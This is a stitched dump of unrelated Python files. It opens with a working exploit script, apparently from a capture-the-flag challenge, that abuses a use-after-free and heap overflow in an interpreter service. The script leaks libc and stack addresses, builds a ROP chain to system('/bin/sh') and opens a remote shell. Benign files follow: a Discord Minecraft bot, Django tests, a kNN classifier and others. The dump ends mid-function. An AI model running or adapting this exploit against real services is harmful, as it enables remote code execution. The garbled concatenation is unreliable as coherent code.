            # Heuristic: If there is an ASCII sequence of X bytes or less surrounded by binary data, treat those as binary as well.
            if tag == TEXT and len(value) <= X and last == BINARY:
                tag = BINARY
            if tag == TEXT:
                buf += ansi(Term.CLEAR) + ansi(color)
            else:
                buf += ansi(color, Term.BOLD, Term.UNDERLINE)
                value = hexlify(value)
            buf += d(value)
            last = tag
        buf += ansi(Term.CLEAR)
        # Step 4: Print :)
        print(buf, end='')
        sys.stdout.flush()

    def setVerbose(self, verbose):
        """Set verbosity of this channel."""
        self._verbose = verbose

    def recv(self, n=4096):
        """Return up to n bytes of data from the remote end.
        Buffers incoming data internally.
        NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.
        """
        if len(self._buf) < n:
            buf = self._s.recv(65536)
            if not buf and not self._buf:
                raise DisconnectException("Server disconnected.")
            if self._verbose:
                self._prettyprint(buf, False)
            self._buf += buf
        # This code also works if n > len(self._buf)
        buf = self._buf[:n]
        self._buf = self._buf[n:]
        return buf

    def recvn(self, n):
        """Return exactly n bytes of data from the remote end."""
        data = []
        while len(data) != n:
            data.append(self.recv(1))
        return b''.join(data)

    @bytes_and_strings_are_cool
    def recvtil(self, delim):
        """Read data from the remote end until delim is found in the data.
        The first occurrence of delim is included in the returned buffer.
        """
        buf = b''
        # TODO maybe not make this O(n**2)...
        while not delim in buf:
            buf += self.recv(1)
        return buf

    def recvregex(self, regex):
        """Receive incoming data until it matches the given regex.
        Returns the match object.
        IMPORTANT: Since the data is coming from the network, it's usually
        a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function
        will return as soon as 'addr: 0xf' is read. Instead, make sure to
        end the regex with a known sequence, e.g. use 'addr: 0x([0-9a-f]+)\\n'.
        """
        if isinstance(regex, str):
            regex = re.compile(regex)
        buf = ''
        match = None
        while not match:
            buf += d(self.recv(1))
            match = regex.search(buf)
        return match

    def recvline(self):
        """Receive and return a line from the remote end.
        The trailing newline character will be included in the returned buffer.
        """
        return self.recvtil('\n')

    def send(self, buf):
        """Send all data in buf to the remote end."""
        if self._verbose:
            self._prettyprint(buf, True)
        self._s.sendall(buf)

    def sendnum(self, n):
        """Send the string representation of n followed by a newline character."""
        self.sendline(str(n))

    @bytes_and_strings_are_cool
    def sendline(self, l):
        """Append a newline to l and send everything to the remote end."""
        self.send(l + b'\n')

    def interact(self):
        """Interact with the remote end: connect stdout and stdin to the socket."""
        # TODO maybe use this at some point: https://docs.python.org/3/library/selectors.html
        self._verbose = False
        try:
            while True:
                available, _, _ = select.select([sys.stdin, self._s], [], [])
                for src in available:
                    if src == sys.stdin:
                        data = sys.stdin.buffer.read1(1024) # Only one read() call, otherwise this breaks when the tty is in raw mode
                        self.send(data)
                    else:
                        data = self.recv(4096)
                        sys.stdout.buffer.write(data)
                        sys.stdout.flush()
        except KeyboardInterrupt:
            return
        except DisconnectException:
            print_info("Server disconnected.")
            return
#
# Telnet emulation
#
def telnet(shell='/bin/bash'):
    """Telnet emulation.
    Opens a PTY on the remote end and connects the master side to the socket.
    Then spawns a shell connected to the slave end and puts the controlling TTY
    on the local machine into raw mode.
    Result: Something similar to a telnet/(plaintext)ssh session.
    Vim, htop, su, less, etc. will work with this.
    !!! This function only works if the channel is connected to a shell !!!
    """
    assert(sys.stdin.isatty())
    c.setVerbose(False)
    # Open a PTY and spawn a bash connected to the slave end on the remote side
    code = 'import pty; pty.spawn([\'{}\', \'-i\'])'.format(shell)
    sendline('python -c "{}"; exit'.format(code))
    time.sleep(0.5) # No really good way of knowing when the shell has opened on the other side...
    # Should maybe put some more functionality into the inline python code instead.
    # Save current TTY settings
    old_settings = termios.tcgetattr(sys.stdin.fileno())
    # Put TTY into raw mode
    tty.setraw(sys.stdin)
    # Resize remote terminal
    # Nice-to-have: also handle terminal resize
    cols, rows = os.get_terminal_size(sys.stdin.fileno())
    sendline('stty rows {} cols {}; echo READY'.format(rows, cols))
    recvtil('READY\r\n') # terminal echo
    recvtil('READY\r\n') # command output
    interact()
    # Restore previous settings
    termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, old_settings)
#
# Convenience wrappers that use the global socket instance
#
# Thin module-level wrappers forwarding to the global Channel instance `c`.
def send(b):
    """Send all data in b to the remote end."""
    c.send(b)

def sendline(l):
    """Send l followed by a newline."""
    c.sendline(l)

def sendnum(n):
    """Send the decimal representation of n followed by a newline."""
    c.sendnum(n)

def recv(n):
    """Return up to n bytes from the remote end."""
    return c.recv(n)

def recvtil(delim):
    """Receive until delim is seen; delim is included in the result."""
    return c.recvtil(delim)

def recvn(n):
    """Return exactly n bytes from the remote end."""
    return c.recvn(n)

def recvline():
    """Return one line, including the trailing newline."""
    return c.recvline()

def recvregex(r):
    """Receive until r matches; return the match object."""
    return c.recvregex(r)

def interact():
    """Connect local stdin/stdout to the remote end."""
    c.interact()
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Global Setup
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Connect to the target service; all convenience wrappers above share
# this single Channel instance.  TARGET and NETDEBUG are defined elsewhere
# in this file (presumably near the top — confirm).
s = socket.create_connection(TARGET)
#s.settimeout(2)
c = Channel(s, NETDEBUG)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Your code here
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Lowercase letters used as variable/property names by the exploit below.
ALPHABET = 'abcdefghijklmnopqrstuvwxyz'

def evl(code):
    """Send one line of code to the remote interpreter."""
    sendline(code)

def readvar(name):
    """Return the raw value of a remote variable.

    Sends a deliberately invalid statement ('=') first so the prompt state
    is known, then echoes the variable and reads up to the next prompt.
    """
    evl('=')
    recvtil('Bad token: 0-1\n> ')
    evl(name)
    response = recvtil('> ')
    return response.split(b'\n')[0]

def readintvar(name):
    """Return a remote integer variable as a Python int."""
    return int(d(readvar(name)))

def readstrvar(name):
    """Return a remote string variable with the surrounding quotes stripped."""
    return readvar(name)[1:-1]
def heapleak():
    """Free the lhs and rhs values during add_assign. ...

    Returns the heap base address (leaked value rounded down to a page).
    """
    # Fill value slots so the next allocation triggers the vulnerable path.
    for i in range(16):
        evl('{}'.format(i))
    # Trigger heap info leak
    evl('h=0+0')
    return readintvar('h') & 0xfffffffffffff000

def gc(remaining):
    """Trigger garbage collection"""
    # Allocate throwaway integer values to fill the remaining slots.
    for i in range(remaining):
        evl('{}'.format(i))

def leak(addr, length):
    """Leaks process memory by abusing the UAF to temporarily inject a fake string."""
    fake_str_addr = heap_base + 0xb0
    # Fake string layout: [length][data pointer].
    fake_str = p64(length) + p64(addr)
    evl(b'l="' + fake_str + b'"') # will be at offset 0xb0 from heap start
    for i in range(15):
        evl('{}'.format(i))
    # 19 slots filled
    # allocate 20th slot with integer value containing the addr of our fake string. The allocate_value() during do_add_assign triggers GC and frees the lhs value
    # Then the output value is allocated into the same slot. Since the output value is String (type of x),
    # lhs is turned into a string with controlled pointer
    evl('a={}+x'.format(fake_str_addr))
    gc(16)
    return readstrvar('a')[0:length]

def leak2(addr, length):
    """Same as above, but different offsets..."""
    fake_str_addr = heap_base + 0x170
    fake_str = p64(length) + p64(addr)
    evl(b'l="' + fake_str + b'"') # will be at offset 0xb0 from heap start
    for i in range(12):
        evl('{}'.format(i))
    evl('a={}+x'.format(fake_str_addr))
    return readstrvar('a')[0:length]
def pwn():
    """Main exploit flow: leak heap/libc/stack/binary addresses via the UAF
    primitives above, then pivot into a ROP chain that calls system("/bin/sh").
    The hard-coded offsets below target one specific libc/binary build.
    """
    global heap_base
    recvtil('>')
    evl('x="XXXXXXXXXXXXXXXX"')  # Workaround, need global object or else GC will crash
    # 2 slots always filled from now on (global object and int value 1337)
    heap_base = heapleak()
    # 3 slots always filled from now on
    print_good("Heap base @ 0x{:x}".format(heap_base))
    # Create a smallbin chunk so we can leak a libc pointer
    evl('"{}"'.format('A' * 0x100))
    gc(20 - 4)
    # Leak freelist pointers pointing into the libc
    heap_mem = leak(heap_base, 0x1000)
    for i in range(0, len(heap_mem)-16, 8):
        # Search for 2 consecutive pointers, those will be the flink and blink of the freed smallbin chunk
        flink = u64(heap_mem[i:i+8])
        blink = u64(heap_mem[i+8:i+16])
        if (abs(flink - heap_base) > 0x10000 and
                flink > 0x7f0000000000 and
                flink < 0x800000000000 and
                blink > 0x7f0000000000 and
                blink < 0x800000000000):
            break
    else:
        print_bad("No freelist pointers found :(")
        return
    libc = flink - 0x3c1928
    print_good("libc @ 0x{:x}".format(libc))
    # Leak stack pointer by reading environ pointer in libc
    env_ptr = u64(leak2(libc + 0x3c44a0, 8))
    print_good("stack @ 0x{:x}".format(env_ptr))
    # Calculate addresses
    system = libc + 0x46590
    bin_sh = libc + 0x180103
    pop_rdi = libc + 0x22b9a
    pop_rsi = libc + 0x24885
    pop_rdx = libc + 0x1b8e
    add_rsp_0x48 = libc + 0xf5b8b
    print_good("/bin/sh @ 0x{:x}".format(bin_sh))
    input_buf = env_ptr - 0x328
    print_good("input_buf @ 0x{:x}".format(input_buf))
    ret_addr = env_ptr - 0x328 - 8
    print_good("return address @ 0x{:x}".format(ret_addr))
    # 5 slots always filled from now
    #
    # Heap spray with Property instances to get a controlled heap layout again
    #
    # Make some objects
    evl('l.a=x')
    evl('h.a=x')
    evl('a.a=x')
    evl('b.a=x')
    evl('c.a=x')
    evl('d.a=x')
    evl('e.a=x')
    evl('f.a=x')
    # Trigger GC
    for i in range(9):
        evl('"{}"'.format('A' * 0x10))
    evl('1337')
    # 10 slots used
    # Allocate lots of properties (but no values)
    for o in ['l', 'a', 'h', 'a', 'b', 'c', 'd', 'e', 'f']:
        for p in ALPHABET:
            evl('{}.{}=x'.format(o, p))
    # Set up heap layout for unbounded heap overflow. We need the following layout:
    #   | chunk to overflow from | ... | Property to corrupt | ... | Fake string |
    # We overflow into "Fake string" to set it's size to 0 and avoid a segfault.
    for i in range(6):
        evl('1337')
    # Create some properties
    for i in 'ghijk':
        evl('{}=x'.format(i))
    # Fake string with length 0xffffffXX => leads to an integer overflow during string_concat and subsequently a heap buffer overflow
    fake_str = p64(0xffffffffffffffff - 0xf - (0x180 - 0x10)) + p64(0x414141414141) + b'D'*0xf0
    evl(b'n="' + fake_str + b'"')
    payload = b'\x00' * 64 + p64(ord('p')) + p64(input_buf + 16 + 0x100) + p64(input_buf-7)
    payload += b'\x00' * (0x180 - len(payload))
    evl(b'o="' + payload + b'"')
    fake_str_addr = heap_base + 0x1e80
    # Trigger the overflow
    evl('p=o+{}'.format(fake_str_addr))
    # Set up a fake string property in the stack ('p' points to it). We need to leak the binary base from the return address
    payload = b'A' * 0x100
    payload += p64(1) + p64(input_buf + 16 + 0x100 + 0x18) + p64(0)
    payload += p64(8) + p64(ret_addr)
    evl(payload)
    binary = readstrvar('p')
    binary = u64(binary) - 2769
    print_good("binary @ 0x{:x}".format(binary))
    offset_to_ret = ret_addr - (input_buf & 0xffffffffffffff00)
    print_good("offset to return address: 0x{:x}".format(offset_to_ret))
    # Some unfortunate restrictions...
    if offset_to_ret > 0x28 or offset_to_ret < 0:
        print_bad("Bad offset")
        return
    prop_name = p64(binary + 0xAC9)[1]
    if prop_name < ord('A') or prop_name > ord('z'):
        print_bad("Bad propery name: {}".format(prop_name))
        return
    prop_name = chr(prop_name)
    print_good("property name: {}".format(prop_name))
    # Write ROP chain into stack
    payload = b'A' * 56
    payload += p64(pop_rdi)
    payload += p64(bin_sh)
    payload += p64(system)
    validate(payload, [b'\n'])
    evl(payload)
    # Trigger corruption of InputBuffer.ptr to point further down in the stack
    evl('{}=42'.format(prop_name))
    # Next input will be written into the stack frame of readline(). Overwrite the return address with "add rsp, 0x48 ; ret"
    payload = b'A'*offset_to_ret
    payload += p64(add_rsp_0x48)
    validate(payload, [b'\n'])
    evl(payload)
    # Wait a short while and drop into interactive mode == shell
    time.sleep(0.5)
    interact()

if __name__ == '__main__':
    pwn()
|
7,652 | a6f242a0443ffbad835f86098b70ede41c03515b | import aiohttp
import asyncio
import base64
import discord
import json
from discord.ext import commands
class BasicMC(commands.Cog):
    """Discord cog with basic Minecraft account utilities (skin lookup,
    gamertag <-> UUID conversion, formatting-code reference) backed by the
    Mojang public APIs."""

    def __init__(self, bot):
        self.bot = bot
        # NOTE(review): the ClientSession is created outside a running event
        # loop and never closed anywhere in this class — confirm lifecycle
        # against aiohttp's recommendations.
        self.session = aiohttp.ClientSession()

    @commands.command(name="stealskin", aliases=["skinsteal", "skin"])
    @commands.cooldown(1, 4, commands.BucketType.user)
    async def skinner(self, ctx, gamertag: str):
        """Fetch and display the skin of the given player."""
        response = await self.session.get(f"https://api.mojang.com/users/profiles/minecraft/{gamertag}")
        # Mojang answers 204 (no content) for unknown gamertags.
        if response.status == 204:
            await ctx.send(
                embed=discord.Embed(color=await self.bot.cc(ctx.author.id), description="That player doesn't exist!"))
            return
        uuid = json.loads(await response.text()).get("id")
        if uuid is None:
            await ctx.send(
                embed=discord.Embed(color=await self.bot.cc(ctx.author.id), description="That player doesn't exist!"))
            return
        # The session server returns the skin as a base64-encoded property.
        response = await self.session.get(
            f"https://sessionserver.mojang.com/session/minecraft/profile/{uuid}?unsigned=false")
        content = json.loads(await response.text())
        if "error" in content:
            if content["error"] == "TooManyRequestsException":
                await ctx.send(embed=discord.Embed(color=await self.bot.cc(ctx.author.id),
                                                   description="Oops, we're being ratelimited by the Mojang API, try again later!"))
                return
        if len(content["properties"]) == 0:
            await ctx.send(embed=discord.Embed(color=await self.bot.cc(ctx.author.id),
                                               description="We can't get this person's skin for some reason..."))
            return
        undec = base64.b64decode(content["properties"][0]["value"])
        try:
            url = json.loads(undec)["textures"]["SKIN"]["url"]
        except Exception:
            await ctx.send(
                embed=discord.Embed(color=await self.bot.cc(ctx.author.id),
                                    description="An error occurred while fetching that skin!"))
            return
        skin_embed = discord.Embed(color=await self.bot.cc(ctx.author.id),
                                   description=f"{gamertag}'s skin\n[**[Download]**]({url})")
        skin_embed.set_thumbnail(url=url)
        skin_embed.set_image(url=f"https://mc-heads.net/body/{gamertag}")
        await ctx.send(embed=skin_embed)

    @commands.command(name="nametouuid", aliases=["uuid", "getuuid"])
    @commands.cooldown(1, 2, commands.BucketType.user)
    async def get_uuid(self, ctx, gamertag: str):
        """Resolve a gamertag to its account UUID."""
        r = await self.session.post("https://api.mojang.com/profiles/minecraft", json=[gamertag])
        j = json.loads(await r.text())  # [0]['id']
        if not j:
            await ctx.send(embed=discord.Embed(color=await self.bot.cc(ctx.author.id),
                                               description="That user could not be found."))
            return
        await ctx.send(
            embed=discord.Embed(color=await self.bot.cc(ctx.author.id), description=f"{gamertag}: ``{j[0]['id']}``"))

    @commands.command(name="uuidtoname", aliases=["getgamertag"])
    @commands.cooldown(1, 2, commands.BucketType.user)
    async def get_gamertag(self, ctx, uuid: str):
        """Resolve a UUID to the account's current gamertag."""
        response = await self.session.get(f"https://api.mojang.com/user/profiles/{uuid}/names")
        if response.status == 204:
            await ctx.send(
                embed=discord.Embed(color=await self.bot.cc(ctx.author.id), description="That player doesn't exist!"))
            return
        j = json.loads(await response.text())
        # The name-history endpoint lists names oldest first; take the latest.
        name = j[len(j) - 1]["name"]
        await ctx.send(embed=discord.Embed(color=await self.bot.cc(ctx.author.id), description=f"{uuid}: ``{name}``"))

    @commands.command(name="colorcodes", aliases=["mccolorcodes", "colors", "cc"])
    async def mc_color_codes(self, ctx):
        """Show a reference card of Minecraft § formatting codes."""
        embed = discord.Embed(color=await self.bot.cc(ctx.author.id),
                              description="Text in Minecraft can be formatted using different codes and\nthe section (``§``) sign.")
        embed.set_author(name="Minecraft Formatting Codes")
        embed.add_field(name="Color Codes", value="<:red:697541699706028083> **Red** ``§c``\n"
                                                  "<:yellow:697541699743776808> **Yellow** ``§e``\n"
                                                  "<:green:697541699316219967> **Green** ``§a``\n"
                                                  "<:aqua:697541699173613750> **Aqua** ``§b``\n"
                                                  "<:blue:697541699655696787> **Blue** ``§9``\n"
                                                  "<:light_purple:697541699546775612> **Light Purple** ``§d``\n"
                                                  "<:white:697541699785719838> **White** ``§f``\n"
                                                  "<:gray:697541699534061630> **Gray** ``§7``\n")
        embed.add_field(name="Color Codes", value="<:dark_red:697541699488055426> **Dark Red** ``§4``\n"
                                                  "<:gold:697541699639050382> **Gold** ``§6``\n"
                                                  "<:dark_green:697541699500769420> **Dark Green** ``§2``\n"
                                                  "<:dark_aqua:697541699475472436> **Dark Aqua** ``§3``\n"
                                                  "<:dark_blue:697541699488055437> **Dark Blue** ``§1``\n"
                                                  "<:dark_purple:697541699437592666> **Dark Purple** ``§5``\n"
                                                  "<:dark_gray:697541699471278120> **Dark Gray** ``§8``\n"
                                                  "<:black:697541699496444025> **Black** ``§0``\n")
        embed.add_field(name="Formatting Codes", value="<:bold:697541699488186419> **Bold** ``§l``\n"
                                                       "<:strikethrough:697541699768942711> ~~Strikethrough~~ ``§m``\n"
                                                       "<:underline:697541699806953583> __Underline__ ``§n``\n"
                                                       "<:italic:697541699152379995> *Italic* ``§o``\n"
                                                       "<:obfuscated:697541699769204736> ||Obfuscated|| ``§k``\n"
                                                       "<:reset:697541699697639446> Reset ``§r``\n")
        await ctx.send(embed=embed)
def setup(bot):
    """discord.py extension entry point: register the BasicMC cog."""
    bot.add_cog(BasicMC(bot))
|
7,653 | 825c9510b055c0fa570f577b1c9616e8bde9c98b | from django.test import TestCase
from .models import Post, Category, Tag
# Create your tests here.
class TestPost(TestCase):
    """Tests for the Post model."""

    def test_str(self):
        """__str__ should return the post title."""
        my_title = Post(title='This is a basic title for a basic test case')
        # assertEqual: assertEquals is a deprecated alias (removed in Python 3.12).
        self.assertEqual(str(my_title), 'This is a basic title for a basic test case')
class TestCategory(TestCase):
    """Tests for the Category model."""

    def test_str(self):
        """__str__ should return the category name."""
        category = Category(name='Test Category')
        # assertEqual: assertEquals is a deprecated alias (removed in Python 3.12).
        self.assertEqual(str(category), 'Test Category')
class TestTag(TestCase):
    """Tests for the Tag model."""

    def test_str(self):
        """__str__ should return the tag name."""
        tag = Tag(name='Test Tag')
        # assertEqual: assertEquals is a deprecated alias (removed in Python 3.12).
        self.assertEqual(str(tag), 'Test Tag')
|
7,654 | 37c42a5e52832c81660e88f45d93e6a9f0300de0 | class Node:
def __init__(self, char = None):
self.char = char
self.children = []
self.end = False
# Root of the global trie; '*' is a sentinel character.
root = Node('*')
# Cursor into the trie (reset per insertion by callers of insert()).
curr = root
# recursive insert into the trie
def insert(s, curr):
    """Insert string s into the trie rooted at node curr (recursively).

    Generalized: scans all existing children for a matching character.
    The original only inspected children[0] and children[1], which silently
    corrupted the trie for alphabets with more than two characters; for the
    two-character case the behavior is unchanged.
    """
    for child in curr.children:
        if child.char == s[0]:
            curr = child
            break
    else:
        # No child holds s[0]: create one and descend into it.
        new_node = Node(s[0])
        curr.children.append(new_node)
        curr = new_node
    if len(s) > 1:
        insert(s[1:], curr)
    else:
        curr.end = True
# search for a string in the trie
def search(sequence):
    """Walk the global trie along *sequence*.

    Returns True if any prefix of *sequence* reachable before the first
    mismatch ends a stored word (the .end flag is checked at every step,
    not only at the final character).
    """
    tmp_node = root
    found = False
    for letter in sequence:
        common = False
        # Find the child holding this letter, if any.
        for child in tmp_node.children:
            if child.char == letter:
                tmp_node = child
                common = True
                break
        if not common:
            # Mismatch: report whatever prefix match was seen so far.
            return found
        if tmp_node.end:
            found = True
    return found
# user input
print('''Type any number of sequences containing only 2 types
of characters 'a' and 'b' to fill the database (ended by blank entry).''')
sequences = []
while True:
    seq = input("Sequence: ")
    if seq == '':
        break
    sequences.append(seq)
node_no = 0
letter = 'none'
# loads strings into the trie
for seq in sequences:
    insert(seq, root)
print("Select 2 sequences from the database.")
# takes 2 strings from user to compare
seq1 = input("Sequence 1: ")
seq2 = input("Sequence 2: ")
if search(seq1) and search(seq2):
    # Walk both strings in lockstep to find the last shared trie node.
    for i in range(min(len(seq1), len(seq2))):
        if seq1[i] == seq2[i]:
            node_no += 1
            letter = seq1[i]
        else:
            break
    print("Last common node is -", letter, "- with node no.", node_no)
else:
    print("One or both the sequences not found in the database.")
|
7,655 | c8975306473dda49be6c5f19f6663214ec7e7105 | import numpy as np
import cPickle as pkl
# Python 2 script (cPickle, integer '/'): loads the UCI covtype dataset,
# shuffles it, splits 60/20/20 into train/valid/test and pickles each part.
data_l = []
data_path = "/home/marc/data/"
with open(data_path+'covtype.data') as fp:
    for line in fp:
        # Each line is a comma-separated row of integer features + label.
        tmp_l = [ int(elem) for elem in line.split(',') ]
        data_l.append(tmp_l)
data = np.array(data_l)
np.random.shuffle(data)
# One fifth of the rows; integer division under Python 2.
quintil = data.shape[0]/5
# Labels are 1-based in the file; shift to 0-based column vectors.
train_x = data[:quintil*3, :-1]
train_y = (data[:quintil*3, -1]-1).reshape((-1,1)).astype(int)
valid_x = data[quintil*3:quintil*4, :-1]
valid_y = (data[quintil*3:quintil*4, -1]-1).reshape((-1,1)).astype(int)
test_x = data[quintil*4:quintil*5, :-1]
test_y = (data[quintil*4:quintil*5, -1]-1).reshape((-1,1)).astype(int)
# NOTE(review): the three lines below compute class counts but discard the
# result — presumably leftovers from interactive exploration.
np.equal(data[:,-1],np.ones(data[:,-1].shape)).sum()
np.equal(data[:,-1],np.ones(data[:,-1].shape)+1).sum()
np.equal(data[:,-1],np.ones(data[:,-1].shape)+2).sum()
dss = [train_x, train_y, valid_x, valid_y, test_x , test_y]
names = ["train_x", "train_y", "valid_x", "valid_y", "test_x", "test_y"]
for ds,name in zip(dss, names):
    # NOTE(review): file handles are never closed/flushed explicitly here.
    f = open(data_path+"COV_"+name+".pkl", "wb")
    pkl.dump(ds,f)
7,656 | c6ce6ffe46be993bfe74ccb240e1ebf586c9f556 | import numpy as np
from math import sqrt
import warnings
from collections import Counter
import pandas as pd
import random
def k_NN(data, predict, k=3):
    """Classify *predict* by majority vote of its k nearest neighbours.

    data:    dict mapping group label -> list of feature vectors
    predict: feature vector to classify
    k:       number of neighbours to vote
    Returns (winning_group, confidence) where confidence is the fraction of
    the k votes cast for the winner.

    The side-effect list comprehension used for building the distance list
    was replaced by explicit loops (comprehensions should not be used for
    their side effects); results are unchanged.
    """
    if len(data) >= k:
        # Warn when k does not exceed the number of groups (ties possible).
        warnings.warn("K is set to a value less than total voting groups !")
    distances = []
    for group in data:
        for features in data[group]:
            dist = np.linalg.norm(np.array(features) - np.array(predict))
            distances.append([dist, group])
    votes = [i[1] for i in sorted(distances)[:k]]
    vote_result = Counter(votes).most_common(1)[0][0]
    confidence = Counter(votes).most_common(1)[0][1] / k
    return vote_result, confidence
# Evaluate the hand-rolled kNN on the Wisconsin breast-cancer dataset.
df = pd.read_csv("breast-cancer-wisconsin.data.txt")
# '?' marks missing values; replace with a large outlier so distance makes it irrelevant.
df.replace('?', -99999, inplace=True)
# Drop the id column.
df.drop(df.columns[[0]], 1, inplace=True)
full_data = df.astype(float).values.tolist()
random.shuffle(full_data)
test_size = 0.2
# Class labels in this dataset: 2 = benign, 4 = malignant.
train_set = {2: [], 4: []}
test_set = {2: [], 4: []}
train_data = full_data[:-int(test_size*len(full_data))]
test_data = full_data[-int(test_size*len(full_data)):]
# Bucket each row's features (all but last column) under its label (last column).
[ train_set[i[-1]].append(i[:-1]) for i in train_data ]
[ test_set[i[-1]].append(i[:-1]) for i in test_data ]
correct = 0
total = 0
confidences = []
for group in test_set:
    for data in test_set[group]:
        vote, confidence = k_NN(train_set, data, k=3)
        if group == vote:
            correct += 1
        total += 1
        confidences.append(confidence)
print('Accuracy:', correct/total, 'Average confidence', (sum(confidences)/len(confidences)))
7,657 | d287a5128ca9352b2edc459c9e42a57ef800ec9c | #!/usr/bin/python
import sys
def get_params(fname):
    """Parse a KEY=VALUE kernel boot-config file into a dict.

    Lines starting with '#' and blank lines are skipped. Only the FIRST '='
    splits key from value, so values containing '=' survive intact (the
    original re-joined them with spaces, corrupting such values, and it
    computed a stripped copy of the line it never used).
    """
    d = dict()
    with open(fname) as f:
        for line in f:
            stripped = line.strip()
            # Skip blank lines and comments.
            if not stripped or stripped.startswith('#'):
                continue
            key, _, value = stripped.partition('=')
            d[key] = value
    return d
# Python 2 script body (bare `print` statements below): compare two kernel
# boot-config files and print every parameter whose values differ.
usage_text = "Compares boot configs of two kernels\n" \
             "Usage: {0} <filename1> <filename2>".format(sys.argv[0])
try:
    f1 = sys.argv[1]
    f2 = sys.argv[2]
except:
    # Missing arguments: show usage and exit.
    print usage_text
    exit()
params1 = get_params(f1)
params2 = get_params(f2)
# Union of all parameter names present in either file.
param_names = set([key for key in params1]) | set([key for key in params2])
the_first = True
# Column layout: 80-char name, two 40-char value columns.
f_output = "{0:80}{1:40}{2:40}"
for param in param_names:
    try:
        val1 = params1[param]
    except KeyError:
        val1 = '-'
    try:
        val2 = params2[param]
    except KeyError:
        val2 = '-'
    if (val1 != val2):
        # Print the header lazily, only once a difference is found.
        if the_first:
            print(f_output.format("Param name", f1, f2))
            print "-"*140
            the_first = False
        print (f_output.format(param, val1, val2))
7,658 | 2b3a7d0c28d1bf7d4400b0e5558b0527a96af781 | import sys
import math
from random import randrange
from utilities import *
from EffectiveThueLemma import *
def getZ(value):
    """Decompose the decimal string of *value*.

    Returns (p10, z) where p10 is 10**(digits before the decimal point,
    or 1 when the value starts with '0') and z is the list of decimal
    digits with the decimal point (and a single leading zero) removed.
    """
    text = str(value)
    if text.startswith('0'):
        # "0.xyz": no scaling; drop the leading zero from the digit list.
        p10 = 1
        digit_source = text[1:]
    else:
        # Count integer-part digits into a power of ten.
        p10 = 10
        for ch in text[1:]:
            if ch == '.':
                break
            p10 *= 10
        digit_source = text
    z = [int(ch) for ch in digit_source if ch != '.']
    return (p10, z)
def Theorem4_9(n, b, R):
    """Rational-reconstruction step via the extended Euclidean algorithm
    (Shoup, "A Computational Introduction to Number Theory", Theorem 4.9).

    Runs EEA on (n, b), maintaining r = s*n + t*b, and returns the first
    triple (r, s, t) with r < R, or None if the loop exhausts.
    Raises ValueError for R >= n or b outside [0, n).

    Fix: the quotient now uses floor division; under Python 3 the original
    `r / rr` produced floats and corrupted the remainder sequence.
    """
    if R >= n:
        raise ValueError("r* >= n")
    if b < 0 or b >= n:
        raise ValueError("b < 0 or b >= n")
    r, rr = n, b  # r0, r1
    s, ss = 1, 0  # s0, s1
    t, tt = 0, 1  # t0, t1
    if r < R:
        return (r, s, t)
    if rr < R:
        return (rr, ss, tt)
    while rr != 0:
        q = r // rr  # integer quotient (was float division under Python 3)
        rrr = r % rr
        r, s, t, rr, ss, tt = rr, ss, tt, rrr, (s - ss * q), (t - tt * q)
        if rr < R:
            return (rr, ss, tt)
    return None
def gcd(a, b):
    """Greatest common divisor via the iterative Euclidean algorithm."""
    while b != 0:
        a, b = b, a % b
    return a
def RationalReconstruction(value, M = int(1e9)):
    """Recover a rational p/q approximating the decimal *value*.

    Builds n = 10^k and b from the digits of value, then applies
    Theorem 4.9 with r* = t* = M and returns (-s', t') reduced by their gcd.

    Fix: M, ss and tt are now reduced with floor division; under Python 3
    the original `/=` silently turned them into floats, so the returned
    numerator/denominator were floats instead of exact integers.
    """
    # check if value is already an integer
    if value.is_integer():
        return (value, 1)
    # get additional 10^x and z array
    p10, z = getZ(value)
    print(z)
    k = len(z)
    # 1. Compute n = 10^k and b = sum(z(i-1) * 10^(k-i)) with i = 1..k
    n = pow(10, k)
    b = 0
    for i in range(1, k + 1):
        b += z[i - 1] * pow(10, k - i)
    # make sure 10^k > 2(M^2)
    while M >= 10 and 2 * (M ** 2) >= n:
        M //= 10
    # 2. Run the extended Euclidean algorithm on input n, b to obtain EEA(n, b)
    # and then apply Theorem 4.9 with n, b, and r* = t* = M to obtain r', s', t'.
    EEA(n, b)
    print(n, b, M)
    rr, ss, tt = Theorem4_9(n, b, M)
    # 3. Output the rational number -s'/t'
    if tt < 0:
        ss, tt = -ss, -tt
    ss *= p10
    g = gcd(abs(ss), abs(tt))
    ss //= g
    tt //= g
    return (-ss, tt)
def main():
    """CLI entry point: reconstruct a rational from argv[1] (float) with an
    optional bound M in argv[2], then print p, q and both decimal forms."""
    if (len(sys.argv) < 2):
        return
    value = float(sys.argv[1])
    M = int(1e9)
    if len(sys.argv) > 2:
        M = int(sys.argv[2])
    p, q = RationalReconstruction(value, M)
    # '%ld'/' %lf': the C-style length modifiers are accepted and ignored
    # by Python's % formatting.
    print("p = %ld" %(p))
    print("q = %ld" %(q))
    print("p/q = %.20lf" %(1.0*p/q))
    print("val = %.20lf" %(value))
main()
7,659 | 1cf4fc37e030a895cb36f537ce9e92df34acfb8b | """
Counted List
Create a class for an list like object based on UserList wrapper
https://docs.python.org/3/library/collections.html#collections.UserList
That object should have a method to return a Counter
https://docs.python.org/3/library/collections.html#collections.Counter
for all objects in the list
Counter should be updated automatically for at least 2 methods (append, pop)
"""
# example to test code
# class Example(UserList)
# ...
#
# x = Example(['1', '2', '3'])
# y = x.get_counter() # y contains Counter({'1':1, '2':1, '3':1})
# x.append(3)
# now y contains Counter({'1':1, '2':1, '3':2})
from collections import UserList,Counter
class CountedList(UserList):
    """A list that maintains a Counter of its elements.

    The Counter returned by Count()/get_counter() is a single shared object
    that append() and pop() keep up to date in place. This replaces the
    original implementation, which updated a *global* variable `y` from
    inside append() (a side effect on module state) and did not support
    pop() at all, despite the stated requirement.
    """

    def Count(self):
        """(Re)build and return the shared Counter for the current data."""
        if not hasattr(self, 'cnt'):
            self.cnt = Counter()
        # Mutate in place so previously returned references stay current.
        self.cnt.clear()
        self.cnt.update(self.data)
        return self.cnt

    def get_counter(self):
        """Alias matching the exercise's example API."""
        return self.Count()

    def append(self, item):
        """Append item and keep the shared Counter in sync."""
        super().append(item)
        if hasattr(self, 'cnt'):
            self.cnt[item] += 1

    def pop(self, i=-1):
